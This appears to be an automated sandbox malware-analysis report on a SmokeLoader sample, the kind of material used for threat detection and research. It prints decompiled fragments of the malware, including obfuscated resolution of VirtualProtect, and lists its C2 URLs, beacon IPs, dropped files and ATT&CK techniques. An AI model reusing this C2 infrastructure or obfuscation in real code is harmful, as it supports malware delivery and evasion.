Function 004028BE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004028BE(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA("kernel32.dll");
				 *0x479758 = _t6;
				 *0x478630 = 0x56;
				 *0x478631 = 0x69;
				 *0x478632 = 0x72;
				 *0x478637 = 0x50;
				 *0x47863d = 0x74;
				 *0x47863e = 0;
				 *0x478633 = 0x74;
				 *0x478634 = 0x75;
				 *0x478635 = 0x61;
				 *0x478636 = 0x6c;
				 *0x478638 = 0x72;
				 *0x478639 = 0x6f;
				 *0x47863a = 0x74;
				 *0x47863b = 0x65;
				 *0x47863c = 0x63;
				 *0x4796c0 = GetProcAddress(_t6, 0x478630);
				_v8 = 0x20;
				_v8 = _v8 + 0x20;
				return  *0x4796c0( *0x4796c8,  *0x479904, _v8,  &_v12, __ecx, __ecx);
			}

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 004028C8
GetProcAddress.KERNEL32(00000000,00478630), ref: 00402942

Strings

, xrefs: 00402954
kernel32.dll, xrefs: 004028C3

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: $kernel32.dll
API String ID: 2574300362-2116778257
Opcode ID: b8359e939c81283bebe729ada419a0bd2d521e6afcb6c88bea73e5e6cbb4ac59
Instruction ID: d649e91e83eb23e24f7f2faa1ebd5f5be3be1502daba47ed32a1c3a808fca3a4
Opcode Fuzzy Hash: b8359e939c81283bebe729ada419a0bd2d521e6afcb6c88bea73e5e6cbb4ac59
Instruction Fuzzy Hash: B411EF744882C0FEE701DB68ED8C7453F956326789F0401BCD18C56AB2DBBA1599C73E

Uniqueness

Uniqueness Score: -1.00%

Function 00408F9B Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408F9B(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E00404698( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E004090CC( *_t72 & 0x000000ff,  &_v20) == 0) {
								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = E00404382();
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							if(_t65 <= 1 || _a12 < _t65) {
								L17:
								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
								_t56 = _v20;
								if(_t58 != 0) {
									L19:
									_t57 =  *(_t56 + 0xac);
									if(_v8 == 0) {
										return _t57;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t57;
								}
								goto L17;
							}
						}
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00408FCF
__isleadbyte_l.LIBCMT ref: 00409003
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00409034
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 004090A2

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e425fc12a51c5a5de07dbfe9a4c054cba0ea8bc6ba5236abac099db2dbbd81cf
Instruction ID: a72e1e6b92dd8046c8415602afada28cf0afd50c9d618631ceac23c624d3e928
Opcode Fuzzy Hash: e425fc12a51c5a5de07dbfe9a4c054cba0ea8bc6ba5236abac099db2dbbd81cf
Instruction Fuzzy Hash: A831AE31A10256EFDB20DF74C9809AB7BA6BF01310B15857EE5A1AB2D2DB34DD80DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409D43 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00409D43(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00409634(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00409724(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00409C49(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00409B8E(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 00409D69

Part of subcall function 00409B8E: __fltout2.LIBCMT ref: 00409BBA

__cftog_l.LIBCMT ref: 00409D8F
__cftoe_l.LIBCMT ref: 00409DC1

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 7aaf76d984b8bee9c108c0065b9737c736a60a61fa3666d8c25626394b4aeabb
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: D511833244014EBBCF125F85DC41CEE3F62BF59394F588426FA1869172C63BC972AB85

Uniqueness

Uniqueness Score: -1.00%

Function 00402834 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402834() {
				long _v8;
				char _v1032;
				void* __edi;
				unsigned int _t4;
				unsigned int _t12;
				unsigned int* _t14;
				unsigned int* _t16;

				_t14 =  *0x4796c8;
				_t4 =  *0x479904 >> 3;
				if(_t4 > 0) {
					_t16 = _t14;
					_t12 = _t4;
					do {
						_t24 =  *0x479904 - 0x959;
						if( *0x479904 == 0x959) {
							GetProcessWorkingSetSize(0, 0, 0);
							WriteConsoleW(0, 0, 0,  &_v8, 0);
							LCMapStringA(0, 0, 0, 0,  &_v1032, 0);
							DebugActiveProcess(0);
						}
						_t4 = E004026CF(_t16, _t24);
						_t16 = _t16 + 8;
						_t12 = _t12 - 1;
					} while (_t12 != 0);
				}
				return _t4;
			}

APIs

GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 00402867
WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402875
LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402887
DebugActiveProcess.KERNEL32(00000000), ref: 0040288E

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: Process$ActiveConsoleDebugSizeStringWorkingWrite
String ID:
API String ID: 4204620807-0
Opcode ID: 20de60e2ee61012a58b6b8025d7d002658b7e72ab285d690b72ada9a80ada242
Instruction ID: 74759e126b1416d0d5b096d680b94f0c74fc9fd99496b66936d923ced4efafbd
Opcode Fuzzy Hash: 20de60e2ee61012a58b6b8025d7d002658b7e72ab285d690b72ada9a80ada242
Instruction Fuzzy Hash: E2F08CB21030387AD3207755AE4CCEB7B6CEF863A5B000136F609A22A0D6745981C6FC

Uniqueness

Uniqueness Score: -1.00%

Function 00408E90 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00408E90(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x410018);
				E0040487C(__ebx, __edi, __esi);
				_t29 = E004063F0(__ebx, _t31);
				_t13 =  *0x411dcc; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E00406842(_t22, _t25, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x411eb0; // 0x411dd8
					 *((intOrPtr*)(_t30 - 0x1c)) = E00408E52(_t8, _t25, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E00408EFA();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E004063F0(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00403B50(0x20);
				}
				return E004048C1(_t29);
			}

APIs

__getptd.LIBCMT ref: 00408E9C

Part of subcall function 004063F0: __getptd_noexit.LIBCMT ref: 004063F3
Part of subcall function 004063F0: __amsg_exit.LIBCMT ref: 00406400

__getptd.LIBCMT ref: 00408EB3
__amsg_exit.LIBCMT ref: 00408EC1
__lock.LIBCMT ref: 00408ED1

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 8cfb4e927b11a63e541db51d14f2b96b8a76d30df1f9827180e7cdf74ed52db0
Instruction ID: 7dfb229ca309a3576c6494551f69a8709b23ae4e697a609cd87e5ec77ce5a6c7
Opcode Fuzzy Hash: 8cfb4e927b11a63e541db51d14f2b96b8a76d30df1f9827180e7cdf74ed52db0
Instruction Fuzzy Hash: E1F090329107408AD720BB6AD502B4E73A0AB40729F11853FE985B72D3CF7CAA019BDD

Uniqueness

Uniqueness Score: -1.00%

Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49708 -> 195.158.3.162:80
Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49709 -> 175.120.254.9:80
Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49715 -> 93.112.238.85:80
Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49719 -> 175.120.254.9:80

Source: Malware configuration extractor	URLs: http://skinndia.com/tmp/
Source: Malware configuration extractor	URLs: http://cracker.biz/tmp/
Source: Malware configuration extractor	URLs: http://piratia-life.ru/tmp/

Source: Joe Sandbox View	IP Address: 93.112.238.85 93.112.238.85
Source: Joe Sandbox View	IP Address: 5.135.247.111 5.135.247.111

Source: explorer.exe, 00000006.00000000.417080410.000000000EBD2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.coyyL
Source: explorer.exe, 00000006.00000000.405148588.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.427104048.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.374860423.000000000091F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\vgfsabt	Joe Sandbox ML: detected

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	TCP traffic detected without corresponding DNS query: 181.215.246.89
Source: unknown	TCP traffic detected without corresponding DNS query: 181.215.246.89
Source: unknown	TCP traffic detected without corresponding DNS query: 181.215.246.89

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\1E3.exe

C:\Users\user\AppData\Roaming\vgfsabt

C:\Users\user\AppData\Roaming\vgfsabt:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Windows Analysis Report
file.exe

Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Function 00401636 Relevance: 10.7, APIs: 7, Instructions: 192
nativeCOMMON

Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 00401633 Relevance: 10.7, APIs: 7, Instructions: 174
nativeCOMMON

Function 004017E4 Relevance: 4.7, APIs: 3, Instructions: 195
nativeCOMMON

Function 0053003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 00530E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004019F2 Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Function 00401A0A Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 54
sleepCOMMON

Function 00401A0E Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Function 00402ADC Relevance: 65.3, APIs: 11, Strings: 26, Instructions: 514
COMMON

Function 0040714F Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Function 00407400 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre